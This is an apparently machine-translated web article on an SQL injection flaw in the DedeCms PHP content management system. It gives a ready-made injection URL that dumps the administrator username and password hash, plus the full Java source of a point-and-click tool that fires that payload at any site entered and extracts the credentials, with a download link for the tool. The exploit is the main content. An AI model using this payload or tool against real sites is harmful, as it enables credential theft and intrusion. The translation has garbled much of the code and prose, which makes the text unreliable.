Dedecms that dreams to open source content management system (PHP). Weave the dream content management system (DedeCms) is famous for its simple, practical, open source, is the country's most famous PHP open source web site management system, is also spoken by the largest user of PHP class CMS system.

recently, the netizens found in dedecms full version of SQL injection vulnerabilities, at present, the latest official version has to repair the vulnerability, related to use of the code is as follows:

EXP:

code is as follows:


http://*. *.. Com/plus/how PHP? Action=& Aid=1 & _FILES [type] [tmp_name]=\ 'or mid=@ ` \' `/*! 50000 union *//*! Select */1, 2, 3, 50000 (the select CONCAT (0 x7c, userid, 0 x7c, PWD) + the from 23 + ` % @ __admin ` limit + 0, 1), 5,6,7,8,9%23 @ ` \ '` + & _FILES [type] [name]=1. Jpg&_FILES [type] [type]=application/octet - stream&_FILES [type] [size]=111

direct access to get the administrator user name and the encrypted password, effect as shown in the figure below

using the tool source (by director) :

code is as follows:


package org. Javaweb. Dede. UI.

import Java awt. Toolkit;
import Java. IO. BufferedReader.
import Java. IO. InputStreamReader;
import java.net.URL;
import Java. Util. Regex. Matcher.
import Java. Util. Regex. The Pattern;

* * *
* @ author yz/

* public class MainFrame extends javax.mail. Swing the JFrame {

private static final long serialVersionUID=1 l;

* * * Creates new form MainFrame/

* public MainFrame () {
initComponents ();
}

public String request (String url) {
String STR="", TMP.
the try {
BufferedReader br=new BufferedReader (new InputStreamReader (new URL (URL). The openStream ()));
the while (TMP=br. ReadLine ())!=null) {
STR +=TMP + "\ r \ n";

}} the catch (Exception e) {
jTextArea1. The setText (e. oString ());
}
return STR.
}

private void initComponents () {

jPanel1=new javax.mail. Swing. The JPanel ();
jLabel1=new javax.mail. Swing the JLabel ();
jTextField1=new javax.mail. Swing the JTextField ();
jButton1=new javax.mail. Swing. JButton ();
jScrollPane1=new javax.mail. Swing the JScrollPane ();
jTextArea1=new javax.mail. Swing. JTextArea ();

setDefaultCloseOperation (javax.mail. Swing. WindowConstants. EXIT_ON_CLOSE);

jLabel1. The setText (" URL: ");
jTextField1. SetText (" <a href="http://localhost" >http://localhost ");

this. SetTitle (" DedeCms. How many PHP injection using tools - p2j. Cn ");

int screenWidth=Toolkit. GetDefaultToolkit () getScreenSize (). The width;
int screenHeight=Toolkit. GetDefaultToolkit () getScreenSize (). The height;
this. SetBounds (screenWidth/2-229, screenHeight/2-158, 458, 316);

jButton1. The setText (" get ");
jButton1. AddActionListener (new Java. The awt. Event. ActionListener () {
public void actionPerformed (Java. The awt. Event. An ActionEvent evt) {
jButton1ActionPerformed (evt);
}
}); .

jTextArea1 setColumns (20);
jTextArea1. SetRows (5); .
jScrollPane1 setViewportView (jTextArea1);

javax.mail. Swing. GroupLayout jPanel1Layout=new javax.mail. Swing. GroupLayout (jPanel1); .
jPanel1 setLayout (jPanel1Layout);
jPanel1Layout.setHorizontalGroup(
jPanel1Layout.createParallelGroup(javax.swing.GroupLayout.Alignment.LEADING)
.addGroup(jPanel1Layout.createSequentialGroup()
.addGroup(jPanel1Layout.createParallelGroup(javax.swing.GroupLayout.Alignment.TRAILING, false)
.addComponent(jScrollPane1, javax.swing.GroupLayout.Alignment.LEADING)
.addGroup(javax.swing.GroupLayout.Alignment.LEADING, jPanel1Layout.createSequentialGroup()
.addContainerGap()
.addComponent(jLabel1)
.addPreferredGap(javax.swing.LayoutStyle.ComponentPlacement.RELATED)
.addComponent(jTextField1, javax.swing.GroupLayout.PREFERRED_SIZE, 331, javax.swing.GroupLayout.PREFERRED_SIZE)
.addPreferredGap(javax.swing.LayoutStyle.ComponentPlacement.RELATED)
.addComponent(jButton1, javax.swing.GroupLayout.PREFERRED_SIZE, 83, javax.swing.GroupLayout.PREFERRED_SIZE)))
.addGap(0, 0, Short.MAX_VALUE))
);
jPanel1Layout.setVerticalGroup(
jPanel1Layout.createParallelGroup(javax.swing.GroupLayout.Alignment.LEADING)
.addGroup(jPanel1Layout.createSequentialGroup()
.addContainerGap()
.addGroup(jPanel1Layout.createParallelGroup(javax.swing.GroupLayout.Alignment.BASELINE)
.addComponent(jLabel1)
.addComponent(jTextField1,
javax.swing.GroupLayout.PREFERRED_SIZE,
javax.swing.GroupLayout.DEFAULT_SIZE,
javax.swing.GroupLayout.PREFERRED_SIZE)
.addComponent(jButton1))
.addPreferredGap(javax.swing.LayoutStyle.ComponentPlacement.RELATED)
.addComponent(jScrollPane1, javax.swing.GroupLayout.DEFAULT_SIZE, 254, Short.MAX_VALUE))
);

javax.mail. Swing. GroupLayout layout=new javax.mail. Swing. GroupLayout (getContentPane ());
getContentPane (). SetLayout (layout);
layout. SetHorizontalGroup (
layout. CreateParallelGroup javax.mail. Swing. GroupLayout. Alignment. (LEADING)
addComponent (jPanel1, javax.mail. Swing. GroupLayout. DEFAULT_SIZE, javax.mail. Swing. GroupLayout. DEFAULT_SIZE, Short. MAX_VALUE)
);
layout. SetVerticalGroup (
layout. CreateParallelGroup javax.mail. Swing. GroupLayout. Alignment. (LEADING)
addComponent (jPanel1, javax.mail. Swing. GroupLayout. DEFAULT_SIZE, javax.mail. Swing. GroupLayout. DEFAULT_SIZE, Short. MAX_VALUE)
);

pack ();
}//</editor - fold>

private void jButton1ActionPerformed (Java. The awt. Event. An ActionEvent evt) {
String url=jTextField1. The getText ();
the if (null url==| | "" equals (url)) {
the return;

} String result=request (url + "/plus/how. PHP? Action=& aid=1 & _FILES [type] [tmp_name]=\ \ % 20 or 27% % 20 mid=@ ` \ \ % 27 ` % 20/*! 50000 union *//*! 50000 select */1, 2, 3, (select % 20 concat (0 x7c, userid, 0 x7c, PWD) + the from 23 + ` % @ __admin ` % 20 limit + 0, 1), 5,6,7,8,9%23 @ ` \ \ % 27 ` + & _FILES [type] [name]=1. Jpg&_FILES [type] [type]=application/octet - stream&_FILES [type] [size]=4294");
the Matcher m=Pattern.com running (" <h2 >(. *) </h2 >"). The Matcher (result);
the if (m. ind ()) {
String [] s=m.g roup (1). The split (" \ \ | ");
the if (s.l ength> 2) {
jTextArea1. The setText (" UserName: "+ s + [1]" \ r \ nMD5: "+ s [2]. The substring (3, s [2]. Length () - 1));

}}
}

public static void main (String args []) {.
Java awt. EventQueue. InvokeLater (new Runnable () {
public void the run () {
new MainFrame (). The setVisible (true);
}
});
}

//Variables declaration - do not modify the
private javax.mail. Swing. JButton jButton1;
private javax.mail. Swing. JLabel jLabel1;
private javax.mail. Swing. JPanel jPanel1;
private javax.mail. Swing. The JScrollPane jScrollPane1;
private javax.mail. Swing. JTextArea jTextArea1;
private javax.mail. Swing. JTextField jTextField1;
//End of the variables declaration
}

use tools download address http://pan.baidu.com/s/1i37LUnF (this website provider (method) may be offensive, only supplies using of the security research and teaching, own risk!)

dedecms official patches address: http://www.dedecms.com/pl/


This concludes the body part